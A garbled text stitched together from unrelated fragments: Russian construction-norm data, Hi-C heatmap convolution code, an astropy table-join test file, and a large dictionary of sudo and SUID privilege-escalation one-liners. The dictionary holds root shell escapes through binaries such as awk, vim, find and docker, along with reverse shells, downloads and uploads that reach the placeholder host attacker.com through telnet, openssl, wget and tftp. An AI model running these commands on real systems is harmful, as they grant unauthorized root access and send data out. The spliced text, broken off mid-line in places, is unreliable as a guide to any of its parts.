'_-Работа строительной бригады (нормо-часов)':802 + 191.59,
'Чугунная труба напорная раструбная 400-мм (метр)':1000,
'Каболка (килограмм)':129,
'Бруски обрезные хвойные 50x100x6000 мм (кубометр)':0.45,
'Раствор кладочный М200 (кубометр)':0.18,
'Раствор асбестоцементный (кубометр)':0.094,
'Вода для строительства (кубометр)':194,
'Использование электростанции передвижной 4 кВт (часов)':6.96,
'Использование установки для гидравлических испытаний трубопрводов (часов)':60,
'Использование трубоукладчика для труб диаметром до 400 мм (часов)':155.49,
'Использование бортового автомобиля до 5 тонн (часов)':0.68,
}
metadict_model['Прокладка 200-мм водопровода (1000 метров)'] = {
# Таблица ГЭСН 22-01-006 Укладка водопроводных чугунных напорных раструбных труб
# при заделке раструбов асбестоцементом
# http://www.norm-load.ru/SNiP/Data1/54/54313/index.htm#i127040
# 01. Опускание и укладка труб.
# 02. Заделка раструбов смоляной прядью и асбестоцементным раствором.
# 03. Гидравлическое испытание трубопровода с устройством и разборкой временных упоров.
# Измеритель: 1 км трубопровода
# Укладка водопроводных чугунных напорных раструбных труб
# при заделке раструбов асбестоцементом диаметром:
# 22-01-006-06 200 мм
# "22-01-006-06" (рабочие): 510 нормо-часа
# "22-01-006-06" (машинисты): 20.91 нормо-часа
'_-Работа строительной бригады (нормо-часов)':510 + 20.91,
'Чугунная труба напорная раструбная 200-мм (метр)':1000,
'Каболка (килограмм)':73,
'Бруски обрезные хвойные 50x100x6000 мм | |
*
* * * * * * * * * * *
WARNING: be carefull with extracting
expected in this case, as it is
not trivial at all !!!
square = True
* * * * * * * * * * *
* * * * *
* * * * *
* * * * *
* * * * * * * * * * *
* * * * *
* * * * *
* * * * * * * * * * *
* * * * * * * * * * *
* * * * *
* * * * *
* * * * * * * * * * *
"""
size = stop - start
tiles = size // step + bool(size % step)
if verbose:
logging.info(
f"matrix of size {size}X{size} to be splitted\n"
+ f" into square tiles of size {step}.\n"
+ f" A small 'edge' of size w={edge} is added, to allow for\n"
+ " meaningfull convolution around boundaries.\n"
+ f" Resulting number of tiles is {tiles * tiles}"
)
for tx in range(tiles):
for ty in range(tiles):
lwx = max(0, step * tx - edge)
rwx = min(size, step * (tx + 1) + edge)
if square and (rwx >= size):
lwx = size - step - edge
lwy = max(0, step * ty - edge)
rwy = min(size, step * (ty + 1) + edge)
if square and (rwy >= size):
lwy = size - step - edge
yield (lwx + start, rwx + start), (lwy + start, rwy + start)
def heatmap_tiles_generator_diag(clr, view_df, pad_size, tile_size, band_to_cover):
"""
A generator yielding heatmap tiles that are needed to cover the requested
band_to_cover around diagonal. Each tile is "padded" with pad_size edge to
allow proper kernel-convolution of pixels close to boundary.
Parameters
----------
clr : cooler
Cooler object to use to extract chromosome extents.
view_df : viewframe
Viewframe with genomic regions to process, chrom, start, end, name.
pad_size : int
Size of padding around each tile. Typically the outer size of the
kernel.
tile_size : int
Size of the heatmap tile.
band_to_cover : int
Size of the diagonal band to be covered by the generated tiles.
Typically correspond to the max_loci_separation for called dots.
Returns
-------
tile : tuple
Generator of tuples of three, which contain
chromosome name, row index of the tile,
column index of the tile (region_name, tilei, tilej).
"""
for chrom, start, end, region_name in view_df.itertuples(index=False):
region_begin, region_end = clr.extent((chrom, start, end))
for tilei, tilej in square_matrix_tiling(
region_begin, region_end, tile_size, pad_size
):
# check if a given tile intersects with
# with the diagonal band of interest ...
diag_from = tilej[0] - tilei[1]
diag_to = tilej[1] - tilei[0]
#
band_from = 0
band_to = band_to_cover
# we are using this >2*padding trick to exclude
# tiles from the lower triangle from calculations ...
if (min(band_to, diag_to) - max(band_from, diag_from)) > 2 * pad_size:
yield region_name, tilei, tilej
##################################
# kernel-convolution related:
##################################
def _convolve_and_count_nans(O_bal, E_bal, E_raw, N_bal, kernel):
"""
Dense versions of a bunch of matrices needed for convolution and
calculation of number of NaNs in a vicinity of each pixel. And a kernel to
be provided of course.
"""
# a matrix filled with the kernel-weighted sums
# based on a balanced observed matrix:
KO = convolve(O_bal, kernel, mode="constant", cval=0.0, origin=0)
# a matrix filled with the kernel-weighted sums
# based on a balanced expected matrix:
KE = convolve(E_bal, kernel, mode="constant", cval=0.0, origin=0)
# get number of NaNs in a vicinity of every
# pixel (kernel's nonzero footprint)
# based on the NaN-matrix N_bal.
# N_bal is shared NaNs between O_bal E_bal,
# is it redundant ?
NN = convolve(
N_bal.astype(np.int64),
# we have to use kernel's
# nonzero footprint:
(kernel != 0).astype(np.int64),
mode="constant",
# there are only NaNs
# beyond the boundary:
cval=1,
origin=0,
)
######################################
# using cval=0 for actual data and
# cval=1 for NaNs matrix reduces
# "boundary issue" to the "number of
# NaNs"-issue
# ####################################
# now finally, E_raw*(KO/KE), as the
# locally-adjusted expected with raw counts as values:
Ek_raw = np.multiply(E_raw, np.divide(KO, KE))
# return locally adjusted expected and number of NaNs
# in the form of dense matrices:
return Ek_raw, NN
########################################################################
# this is the MAIN function to get locally adjusted expected
########################################################################
def get_adjusted_expected_tile_some_nans(
origin, observed, expected, bal_weights, kernels, balance_factor=None, verbose=False
):
"""
Get locally adjusted expected for a collection of local-filters (kernels).
Such locally adjusted expected, 'Ek' for a given kernel,
can serve as a baseline for deciding whether a given
pixel is enriched enough to call it a feature (dot-loop,
flare, etc.) in a downstream analysis.
For every pixel of interest [i,j], locally adjusted
expected is a product of a global expected in that
pixel E_bal[i,j] and an enrichment of local environ-
ment of the pixel, described with a given kernel:
::
KERNEL[i,j](O_bal)
Ek_bal[i,j] = E_bal[i,j]* ------------------
KERNEL[i,j](E_bal)
where KERNEL[i,j](X) is a result of convolution
between the kernel and a slice of matrix X centered
around (i,j). See link below for details:
https://en.wikipedia.org/wiki/Kernel_(image_processing)
Returned values for observed and all expecteds
are rescaled back to raw-counts, for the sake of
downstream statistical analysis, which is using
Poisson test to decide is a given pixel is enriched.
(comparison between balanced values using Poisson-
test is intractable):
::
KERNEL[i,j](O_bal)
Ek_raw[i,j] = E_raw[i,j]* ------------------ ,
KERNEL[i,j](E_bal)
where E_raw[i,j] is:
::
1 1
-------------- * -------------- * E_bal[i,j]
bal_weights[i] bal_weights[j]
Parameters
----------
origin : (int,int) tuple
tuple of interegers that specify the
location of an observed matrix slice.
Measured in bins, not in nucleotides.
observed : numpy.ndarray
square symmetrical dense-matrix
that contains balanced observed O_bal
expected : numpy.ndarray
square symmetrical dense-matrix
that contains expected, calculated
based on balanced observed: E_bal.
bal_weights : numpy.ndarray or (numpy.ndarray, numpy.ndarray)
1D vector used to turn raw observed
into balanced observed for a slice of
a matrix with the origin on the diagonal;
and a tuple/list of a couple of 1D arrays
in case it is a slice with an arbitrary
origin.
kernels : dict of (str, numpy.ndarray)
dictionary of kernels/masks to perform
convolution of the heatmap. Kernels
describe the local environment, and
used to estimate baseline for finding
enriched/prominent peaks.
Peak must be enriched with respect to
all local environments (all kernels),
to be considered significant.
Dictionay keys must contain names for
each kernel.
Note, scipy.ndimage.convove flips kernel
first and only then applies it to matrix.
balance_factor: float
Multiplicative Balancing factor:
balanced matrix multiplied by this factor
sums up to the total number of reads (taking
symmetry into account) instead of number of
bins in matrix. defaults to None and skips
a lowleft KernelObserved factor calculation.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
We need this to test how dynamic donut size
is affecting peak calling results.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
verbose: bool
Set to True to print some progress
messages to stdout.
Returns
-------
peaks_df : pandas.DataFrame
sparsified DataFrame that stores results of
locally adjusted calculations for every kernel
for a given slice of input matrix. Multiple
instences of such 'peaks_df' can be concatena-
ted and deduplicated for the downstream analysis.
Reported columns:
bin1_id - bin1_id index (row), adjusted to origin
bin2_id - bin bin2_id index, adjusted to origin
la_exp - locally adjusted expected (for each kernel)
la_nan - number of NaNs around (each kernel's footprint)
exp.raw - global expected, rescaled to raw-counts
obs.raw - observed values in raw-counts.
"""
# extract origin coordinate of this tile:
io, jo = origin
# let's extract full matrices and ice_vector:
O_raw = observed # raw observed, no need to copy, no modifications.
E_bal = np.copy(expected)
# 'bal_weights': ndarray or a couple of those ...
if isinstance(bal_weights, np.ndarray):
v_bal_i = bal_weights
v_bal_j = bal_weights
elif isinstance(bal_weights, (tuple, list)):
v_bal_i, v_bal_j = bal_weights
else:
raise ValueError(
"'bal_weights' must be an | |
[
"sudo env /bin/sh"
],
"base64":
[
"LFILE=file_to_read\nsudo base64 \"$LFILE\" | base64 --decode"
],
"zypper":
[
"sudo zypper x\n",
"TF=$(mktemp -d)\ncp /bin/sh $TF/zypper-x\nsudo PATH=$TF:$PATH zypper x\n"
],
"curl":
[
"URL=http://attacker.com/file_to_get\nLFILE=file_to_save\nsudo curl $URL -o $LFILE\n"
],
"hd":
[
"LFILE=file_to_read\nsudo hd \"$LFILE\"\n"
],
"nroff":
[
"TF=$(mktemp -d)\necho '#!/bin/sh' > $TF/groff\necho '/bin/sh' >> $TF/groff\nchmod +x $TF/groff\nsudo GROFF_BIN_PATH=$TF nroff\n"
],
"pg":
[
"sudo pg /etc/profile\n!/bin/sh\n"
],
"zsoelim":
[
"LFILE=file_to_read\nsudo zsoelim \"$LFILE\"\n"
],
"cowsay":
[
"TF=$(mktemp)\necho 'exec \"/bin/sh\";' >$TF\nsudo cowsay -f $TF x\n"
],
"dialog":
[
"LFILE=file_to_read\nsudo dialog --textbox \"$LFILE\" 0 0\n"
],
"uuencode":
[
"LFILE=file_to_read\nsudo uuencode \"$LFILE\" /dev/stdout | uudecode\n"
],
"comm":
[
"LFILE=file_to_read\nsudo comm $LFILE /dev/null 2>/dev/null\n"
],
"chmod":
[
"LFILE=file_to_change\nsudo chmod 6777 $LFILE\n"
],
"mawk":
[
"sudo mawk 'BEGIN {system(\"/bin/sh\")}'"
],
"rev":
[
"LFILE=file_to_read\nsudo rev $LFILE | rev\n"
],
"wish":
[
"sudo wish\nexec /bin/sh <@stdin >@stdout 2>@stderr\n"
],
"nohup":
[
"sudo nohup /bin/sh -c \"sh <$(tty) >$(tty) 2>$(tty)\""
],
"telnet":
[
"RHOST=attacker.com\nRPORT=12345\nsudo telnet $RHOST $RPORT\n^]\n!/bin/sh\n"
],
"od":
[
"LFILE=file_to_read\nsudo od -An -c -w9999 \"$LFILE\"\n"
],
"time":
[
"sudo /usr/bin/time /bin/sh"
],
"bundler":
[
"sudo bundler help\n!/bin/sh\n"
],
"rsync":
[
"sudo rsync -e 'sh -c \"sh 0<&2 1>&2\"' 127.0.0.1:/dev/null"
],
"mail":
[
"sudo mail --exec='!/bin/sh'"
],
"logsave":
[
"sudo logsave /dev/null /bin/sh -i"
],
"screen":
[
"sudo screen"
],
"lua":
[
"sudo lua -e 'os.execute(\"/bin/sh\")'"
],
"busctl":
[
"sudo busctl --show-machine\n!/bin/sh\n"
],
"csplit":
[
"LFILE=file_to_read\ncsplit $LFILE 1\ncat xx01\n"
],
"tee":
[
"LFILE=file_to_write\necho DATA | sudo tee -a \"$LFILE\"\n"
],
"iftop":
[
"sudo iftop\n!/bin/sh\n"
],
"eb":
[
"sudo eb logs\n!/bin/sh\n"
],
"troff":
[
"LFILE=file_to_read\nsudo troff $LFILE\n"
],
"git":
[
"sudo PAGER='sh -c \"exec sh 0<&1\"' git -p help",
"sudo git -p help config\n!/bin/sh\n",
"sudo git branch --help config\n!/bin/sh\n",
"TF=$(mktemp -d)\ngit init \"$TF\"\necho 'exec /bin/sh 0<&2 1>&2' >\"$TF/.git/hooks/pre-commit.sample\"\nmv \"$TF/.git/hooks/pre-commit.sample\" \"$TF/.git/hooks/pre-commit\"\nsudo git -C \"$TF\" commit --allow-empty -m x\n",
"TF=$(mktemp -d)\nln -s /bin/sh \"$TF/git-x\"\nsudo git \"--exec-path=$TF\" x\n"
],
"fmt":
[
"LFILE=file_to_read\nsudo fmt -999 \"$LFILE\"\n"
],
"tail":
[
"LFILE=file_to_read\nsudo tail -c1G \"$LFILE\"\n"
],
"expect":
[
"sudo expect -c 'spawn /bin/sh;interact'"
],
"openssl":
[
"RHOST=attacker.com\nRPORT=12345\nmkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | sudo openssl s_client -quiet -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s\n"
],
"unexpand":
[
"LFILE=file_to_read\nsudo unexpand -t99999999 \"$LFILE\"\n"
],
"smbclient":
[
"sudo smbclient '\\\\attacker\\share'\n!/bin/sh\n"
],
"service":
[
"sudo service ../../bin/sh"
],
"check_by_ssh":
[
"sudo check_by_ssh -o \"ProxyCommand /bin/sh -i <$(tty) |& tee $(tty)\" -H localhost -C xx"
],
"dpkg":
[
"sudo dpkg -l\n!/bin/sh\n",
"sudo dpkg -i x_1.0_all.deb"
],
"iconv":
[
"LFILE=file_to_read\n./iconv -f 8859_1 -t 8859_1 \"$LFILE\"\n"
],
"grep":
[
"LFILE=file_to_read\nsudo grep '' $LFILE\n"
],
"hping3":
[
"sudo hping3\n/bin/sh\n"
],
"irb":
[
"sudo irb\nexec '/bin/bash'\n"
],
"apt-get":
[
"sudo apt-get changelog apt\n!/bin/sh\n",
"TF=$(mktemp)\necho 'Dpkg::Pre-Invoke {\"/bin/sh;false\"}' > $TF\nsudo apt-get install -c $TF sl\n",
"sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh"
],
"cpan":
[
"sudo cpan\n! exec '/bin/bash'\n"
],
"strace":
[
"sudo strace -o /dev/null /bin/sh"
],
"redcarpet":
[
"LFILE=file_to_read\nsudo redcarpet \"$LFILE\"\n"
],
"ruby":
[
"sudo ruby -e 'exec \"/bin/sh\"'"
],
"csh":
[
"sudo csh"
],
"ul":
[
"LFILE=file_to_read\nsudo ul \"$LFILE\"\n"
],
"genisoimage":
[
"LFILE=file_to_read\nsudo genisoimage -q -o - \"$LFILE\"\n"
],
"facter":
[
"TF=$(mktemp -d)\necho 'exec(\"/bin/sh\")' > $TF/x.rb\nsudo FACTERLIB=$TF facter\n"
],
"timeout":
[
"sudo timeout --foreground 7d /bin/sh"
],
"taskset":
[
"sudo taskset 1 /bin/sh"
],
"ssh-keyscan":
[
"LFILE=file_to_read\nsudo ssh-keyscan -f $LFILE\n"
],
"nawk":
[
"sudo nawk 'BEGIN {system(\"/bin/sh\")}'"
],
"pdb":
[
"TF=$(mktemp)\necho 'import os; os.system(\"/bin/sh\")' > $TF\nsudo pdb $TF\ncont\n"
],
"red":
[
"sudo red file_to_write\na\nDATA\n.\nw\nq\n"
],
"ghc":
[
"sudo ghc -e 'System.Process.callCommand \"/bin/sh\"'"
],
"capsh":
[
"sudo capsh --"
],
"docker":
[
"sudo docker run -v /:/mnt --rm -it alpine chroot /mnt sh"
],
"tclsh":
[
"sudo tclsh\nexec /bin/sh <@stdin >@stdout 2>@stderr\n"
],
"dash":
[
"sudo dash"
],
"zsh":
[
"sudo zsh"
],
"join":
[
"LFILE=file_to_read\nsudo join -a 2 /dev/null $LFILE\n"
],
"at":
[
"echo \"/bin/sh <$(tty) >$(tty) 2>$(tty)\" | sudo at now; tail -f /dev/null\n"
],
"su":
[
"sudo su"
],
"top":
[
"echo -e 'pipe\\tx\\texec /bin/sh 1>&0 2>&0' >>/root/.config/procps/toprc\nsudo top\n# press return twice\nreset\n"
],
"awk":
[
"sudo awk 'BEGIN {system(\"/bin/sh\")}'"
],
"cp":
[
"LFILE=file_to_write\necho \"DATA\" | sudo cp /dev/stdin \"$LFILE\"\n",
"LFILE=file_to_write\nTF=$(mktemp)\necho \"DATA\" > $TF\nsudo cp $TF $LFILE\n"
],
"gimp":
[
"sudo gimp -idf --batch-interpreter=python-fu-eval -b 'import os; os.system(\"sh\")'"
],
"chroot":
[
"sudo chroot /\n"
],
"xmodmap":
[
"LFILE=file_to_read\nsudo xmodmap -v $LFILE\n"
],
"perl":
[
"sudo perl -e 'exec \"/bin/sh\";'"
],
"mtr":
[
"LFILE=file_to_read\nsudo mtr --raw -F \"$LFILE\"\n"
],
"sort":
[
"LFILE=file_to_read\nsudo sort -m \"$LFILE\"\n"
],
"man":
[
"sudo man man\n!/bin/sh\n"
],
"cat":
[
"LFILE=file_to_read\nsudo cat \"$LFILE\"\n"
],
"tar":
[
"sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh"
],
"aria2c":
[
"COMMAND='id'\nTF=$(mktemp)\necho \"$COMMAND\" > $TF\nchmod +x $TF\nsudo aria2c --on-download-error=$TF http://x\n"
],
"shuf":
[
"LFILE=file_to_write\nsudo shuf -e DATA -o \"$LFILE\"\n"
],
"sed":
[
"sudo sed -n '1e exec sh 1>&0' /etc/hosts"
],
"composer":
[
"TF=$(mktemp -d)\necho '{\"scripts\":{\"x\":\"/bin/sh -i 0<&3 1>&3 2>&3\"}}' >$TF/composer.json\nsudo composer --working-dir=$TF run-script x\n"
],
"check_memory":
[
"LFILE=file_to_read\nsudo check_memory --extra-opts=@$LFILE\n"
],
"soelim":
[
"LFILE=file_to_read\nsudo soelim \"$LFILE\"\n"
],
"look":
[
"LFILE=file_to_read\nsudo look '' \"$LFILE\"\n"
],
"tmux":
[
"sudo tmux"
],
"bash":
[
"sudo bash"
],
"chown":
[
"LFILE=file_to_change\nsudo chown $(id -un):$(id -gn) $LFILE\n"
],
"unshare":
[
"sudo unshare /bin/sh"
],
"readelf":
[
"LFILE=file_to_read\nsudo readelf -a @$LFILE\n"
],
"cut":
[
"LFILE=file_to_read\nsudo cut -d \"\" -f1 \"$LFILE\"\n"
],
"mv":
[
"LFILE=file_to_write\nTF=$(mktemp)\necho \"DATA\" > $TF\nsudo mv $TF $LFILE\n"
],
"vi":
[
"sudo vi -c ':!/bin/sh' /dev/null"
],
"valgrind":
[
"sudo valgrind /bin/sh"
],
"lwp-download":
[
"URL=http://attacker.com/file_to_get\nLFILE=file_to_save\nsudo lwp-download $URL $LFILE\n"
],
"crontab":
[
"sudo crontab -e"
]
}
suid_bins = {
"head":
[
"LFILE=file_to_read\n./head -c1G \"$LFILE\"\n"
],
"systemctl":
[
"TF=$(mktemp).service\necho '[Service]\nType=oneshot\nExecStart=/bin/sh -c \"id > /tmp/output\"\n[Install]\nWantedBy=multi-user.target' > $TF\n./systemctl link $TF\n./systemctl enable --now $TF\n"
],
"arp":
[
"LFILE=file_to_read\n./arp -v -f \"$LFILE\"\n"
],
"ash":
[
"./ash"
],
"cupsfilter":
[
"LFILE=file_to_read\n./cupsfilter -i application/octet-stream -m application/octet-stream $LFILE\n"
],
"ip":
[
"LFILE=file_to_read\n./ip -force -batch \"$LFILE\"\n",
"./ip netns add foo\n./ip netns exec foo /bin/sh -p\n./ip netns delete foo\n"
],
"flock":
[
"./flock -u / /bin/sh -p"
],
"find":
[
"./find . -exec /bin/sh -p \\; -quit"
],
"gdb":
[
"./gdb -nx -ex 'python import os; os.execl(\"/bin/sh\", \"sh\", \"-p\")' -ex quit"
],
"make":
[
"COMMAND='/bin/sh -p'\n./make -s --eval=$'x:\\n\\t-'\"$COMMAND\"\n"
],
"diff":
[
"LFILE=file_to_read\n./diff --line-format=%L /dev/null $LFILE\n"
],
"ksshell":
[
"LFILE=file_to_read\n./ksshell -i $LFILE\n"
],
"ss":
[
"LFILE=file_to_read\n./ss -a -F $LFILE\n"
],
"tftp":
[
"RHOST=attacker.com\n./tftp $RHOST\nput file_to_send\n"
],
"nice":
[
"./nice /bin/sh -p"
],
"vim":
[
"./vim -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-pc\", \"reset; exec sh -p\")'"
],
"python":
[
"./python -c 'import os; os.execl(\"/bin/sh\", \"sh\", \"-p\")'"
],
"update-alternatives":
[
"LFILE=/path/to/file_to_write\nTF=$(mktemp)\necho DATA >$TF\n./update-alternatives --force --install \"$LFILE\" x \"$TF\" 0\n"
],
"nmap":
[
"LFILE=file_to_write\n./nmap -oG=$LFILE DATA\n"
],
"more":
[
"./more file_to_read"
],
"ionice":
[
"./ionice /bin/sh -p"
],
"emacs":
[
"./emacs -Q -nw --eval '(term \"/bin/sh -p\")'"
],
"jq":
[
"LFILE=file_to_read\n./jq -Rr . \"$LFILE\"\n"
],
"uniq":
[
"LFILE=file_to_read\n./uniq \"$LFILE\"\n"
],
"busybox":
[
"./busybox sh"
],
"lwp-request":
[
"LFILE=file_to_read\n./lwp-request \"file://$LFILE\"\n"
],
"pr":
[
"LFILE=file_to_read\npr -T $LFILE\n"
],
"view":
[
"./view -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-pc\", \"reset; exec sh -p\")'"
],
"tbl":
[
"LFILE=file_to_read\n./tbl $LFILE\n"
],
"nl":
[
"LFILE=file_to_read\n./nl -bn -w1 -s '' $LFILE\n"
],
"rview":
[
"./rview -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-pc\", \"reset; exec sh -p\")'"
],
"file":
[
"LFILE=file_to_read\n./file -f $LFILE\n"
],
"dig":
[
"LFILE=file_to_read\n./dig -f $LFILE\n"
],
"xargs":
[
"./xargs -a /dev/null sh -p"
],
"expand":
[
"LFILE=file_to_read\n./expand \"$LFILE\"\n"
],
"strings":
[
"LFILE=file_to_read\n./strings \"$LFILE\"\n"
],
"restic":
[
"RHOST=attacker.com\nRPORT=12345\nLFILE=file_or_dir_to_get\nNAME=backup_name\n./restic backup -r \"rest:http://$RHOST:$RPORT/$NAME\" \"$LFILE\"\n"
],
"xxd":
[
"LFILE=file_to_read\n./xxd \"$LFILE\" | xxd -r\n"
],
"eqn":
[
"LFILE=file_to_read\n./eqn \"$LFILE\"\n"
],
"ksh":
[
"./ksh -p"
],
"ld.so":
[
"./ld.so /bin/sh -p"
],
"date":
[
"LFILE=file_to_read\n./date -f $LFILE\n"
],
"tac":
[
"LFILE=file_to_read\n./tac -s 'RANDOM' \"$LFILE\"\n"
],
"wget":
[
"URL=http://attacker.com/file_to_get\nLFILE=file_to_save\n./wget $URL -O $LFILE\n"
],
"start-stop-daemon":
[
"./start-stop-daemon -n $RANDOM -S -x /bin/sh -- -p"
],
"column":
[
"LFILE=file_to_read\n./column $LFILE\n"
],
"gtester":
[
"TF=$(mktemp)\necho '#!/bin/sh -p' > $TF\necho 'exec /bin/sh -p 0<&1' >> $TF\nchmod +x $TF\nsudo gtester -q $TF\n"
],
"fold":
[
"LFILE=file_to_read\n./fold -w99999999 \"$LFILE\"\n"
],
"less":
[
"./less file_to_read"
],
"jrunscript":
[
"./jrunscript -e \"exec('/bin/sh -pc \\$@|sh\\${IFS}-p _ echo sh -p | |
# Licensed under a 3-clause BSD style license - see LICENSE.rst
# TEST_UNICODE_LITERALS
import numpy as np
from ...tests.helper import pytest, catch_warnings
from ...table import Table, TableMergeError
from ...utils import OrderedDict, metadata
from ...utils.metadata import MergeConflictError
from ... import table
def sort_eq(list1, list2):
return sorted(list1) == sorted(list2)
class TestJoin():
def setup_method(self, method):
lines1 = [' a b c ',
' 0 foo L1',
' 1 foo L2',
' 1 bar L3',
' 2 bar L4']
lines2 = [' a b d ',
' 1 foo R1',
' 1 foo R2',
' 2 bar R3',
' 4 bar R4']
self.t1 = Table.read(lines1, format='ascii')
self.t2 = Table.read(lines2, format='ascii')
self.t3 = Table(self.t2, copy=True)
self.t1.meta.update(OrderedDict([('b', [1, 2]), ('c', {'a': 1}), ('d', 1)]))
self.t2.meta.update(OrderedDict([('b', [3, 4]), ('c', {'b': 1}), ('a', 1)]))
self.t3.meta.update(OrderedDict([('b', 3), ('c', [1, 2]), ('d', 2), ('a', 1)]))
self.meta_merge = OrderedDict([('b', [1, 2, 3, 4]),
('c', {'a': 1, 'b': 1}),
('d', 1),
('a', 1)])
def test_table_meta_merge(self):
out = table.join(self.t1, self.t2, join_type='inner')
assert out.meta == self.meta_merge
def test_table_meta_merge_conflict(self):
with catch_warnings() as w:
out = table.join(self.t1, self.t3, join_type='inner')
assert len(w) == 3
assert out.meta == self.t3.meta
with catch_warnings() as w:
out = table.join(self.t1, self.t3, join_type='inner', metadata_conflicts='warn')
assert len(w) == 3
assert out.meta == self.t3.meta
with catch_warnings() as w:
out = table.join(self.t1, self.t3, join_type='inner', metadata_conflicts='silent')
assert len(w) == 0
assert out.meta == self.t3.meta
with pytest.raises(MergeConflictError):
out = table.join(self.t1, self.t3, join_type='inner', metadata_conflicts='error')
with pytest.raises(ValueError):
out = table.join(self.t1, self.t3, join_type='inner', metadata_conflicts='nonsense')
def test_both_unmasked_inner(self):
t1 = self.t1
t2 = self.t2
# Basic join with default parameters (inner join on common keys)
t12 = table.join(t1, t2)
assert t12.masked is False
assert sort_eq(t12.pformat(), [' a b c d ',
'--- --- --- ---',
' 1 foo L2 R1',
' 1 foo L2 R2',
' 2 bar L4 R3'])
# Table meta merged properly
assert t12.meta == self.meta_merge
def test_both_unmasked_left_right_outer(self):
t1 = self.t1
t2 = self.t2
# Left join
t12 = table.join(t1, t2, join_type='left')
assert t12.masked is True
assert sort_eq(t12.pformat(), [' a b c d ',
'--- --- --- ---',
' 0 foo L1 --',
' 1 bar L3 --',
' 1 foo L2 R1',
' 1 foo L2 R2',
' 2 bar L4 R3'])
# Right join
t12 = table.join(t1, t2, join_type='right')
assert t12.masked is True
assert sort_eq(t12.pformat(), [' a b c d ',
'--- --- --- ---',
' 1 foo L2 R1',
' 1 foo L2 R2',
' 2 bar L4 R3',
' 4 bar -- R4'])
# Outer join
t12 = table.join(t1, t2, join_type='outer')
assert t12.masked is True
assert sort_eq(t12.pformat(), [' a b c d ',
'--- --- --- ---',
' 0 foo L1 --',
' 1 bar L3 --',
' 1 foo L2 R1',
' 1 foo L2 R2',
' 2 bar L4 R3',
' 4 bar -- R4'])
# Check that the common keys are 'a', 'b'
t12a = table.join(t1, t2, join_type='outer')
t12b = table.join(t1, t2, join_type='outer', keys=['a', 'b'])
assert np.all(t12a.as_array() == t12b.as_array())
def test_both_unmasked_single_key_inner(self):
t1 = self.t1
t2 = self.t2
# Inner join on 'a' column
t12 = table.join(t1, t2, keys='a')
assert t12.masked is False
assert sort_eq(t12.pformat(), [' a b_1 c b_2 d ',
'--- --- --- --- ---',
' 1 foo L2 foo R1',
' 1 foo L2 foo R2',
' 1 bar L3 foo R1',
' 1 bar L3 foo R2',
' 2 bar L4 bar R3'])
def test_both_unmasked_single_key_left_right_outer(self):
t1 = self.t1
t2 = self.t2
# Left join
t12 = table.join(t1, t2, join_type='left', keys='a')
assert t12.masked is True
assert sort_eq(t12.pformat(), [' a b_1 c b_2 d ',
'--- --- --- --- ---',
' 0 foo L1 -- --',
' 1 foo L2 foo R1',
' 1 foo L2 foo R2',
' 1 bar L3 foo R1',
' 1 bar L3 foo R2',
' 2 bar L4 bar R3'])
# Right join
t12 = table.join(t1, t2, join_type='right', keys='a')
assert t12.masked is True
assert sort_eq(t12.pformat(), [' a b_1 c b_2 d ',
'--- --- --- --- ---',
' 1 foo L2 foo R1',
' 1 foo L2 foo R2',
' 1 bar L3 foo R1',
' 1 bar L3 foo R2',
' 2 bar L4 bar R3',
' 4 -- -- bar R4'])
# Outer join
t12 = table.join(t1, t2, join_type='outer', keys='a')
assert t12.masked is True
assert sort_eq(t12.pformat(), [' a b_1 c b_2 d ',
'--- --- --- --- ---',
' 0 foo L1 -- --',
' 1 foo L2 foo R1',
' 1 foo L2 foo R2',
' 1 bar L3 foo R1',
' 1 bar L3 foo R2',
' 2 bar L4 bar R3',
' 4 -- -- bar R4'])
def test_masked_unmasked(self):
t1 = self.t1
t1m = Table(self.t1, masked=True)
t2 = self.t2
# Result should be masked even though not req'd by inner join
t1m2 = table.join(t1m, t2, join_type='inner')
assert t1m2.masked is True
# Result should match non-masked result
t12 = table.join(t1, t2)
assert np.all(t12.as_array() == np.array(t1m2))
# Mask out some values in left table and make sure they propagate
t1m['b'].mask[1] = True
t1m['c'].mask[2] = True
t1m2 = table.join(t1m, t2, join_type='inner', keys='a')
assert sort_eq(t1m2.pformat(), [' a b_1 c b_2 d ',
'--- --- --- --- ---',
' 1 -- L2 foo R1',
' 1 -- L2 foo R2',
' 1 bar -- foo R1',
' 1 bar -- foo R2',
' 2 bar L4 bar R3'])
t21m = table.join(t2, t1m, join_type='inner', keys='a')
assert sort_eq(t21m.pformat(), [' a b_1 d b_2 c ',
'--- --- --- --- ---',
' 1 foo R2 -- L2',
' 1 foo R2 bar --',
' 1 foo R1 -- L2',
' 1 foo R1 bar --',
' 2 bar R3 bar L4'])
def test_masked_masked(self):
"""Two masked tables"""
t1 = self.t1
t1m = Table(self.t1, masked=True)
t2 = self.t2
t2m = Table(self.t2, masked=True)
# Result should be masked even though not req'd by inner join
t1m2m = table.join(t1m, t2m, join_type='inner')
assert t1m2m.masked is True
# Result should match non-masked result
t12 = table.join(t1, t2)
assert np.all(t12.as_array() == np.array(t1m2m))
# Mask out some values in both tables and make sure they propagate
t1m['b'].mask[1] = True
t1m['c'].mask[2] = True
t2m['d'].mask[2] = True
t1m2m = table.join(t1m, t2m, join_type='inner', keys='a')
assert sort_eq(t1m2m.pformat(), [' a b_1 c b_2 d ',
'--- --- --- --- ---',
' 1 -- L2 foo R1',
' 1 -- L2 foo R2',
' 1 bar -- foo R1',
' 1 bar -- foo R2',
' 2 bar L4 bar --'])
def test_col_rename(self):
"""
Test auto col renaming when there is a conflict. Use
non-default values of uniq_col_name and table_names.
"""
t1 = self.t1
t2 = self.t2
t12 = table.join(t1, t2, uniq_col_name='x_{table_name}_{col_name}_y',
table_names=['L', 'R'], keys='a')
assert t12.colnames == ['a', 'x_L_b_y', 'c', 'x_R_b_y', 'd']
def test_rename_conflict(self):
"""
Test that auto-column rename fails because of a conflict
with an existing column
"""
t1 = self.t1
t2 = self.t2
t1['b_1'] = 1 # Add a new column b_1 that will conflict with auto-rename
with pytest.raises(TableMergeError):
table.join(t1, t2, keys='a')
def test_missing_keys(self):
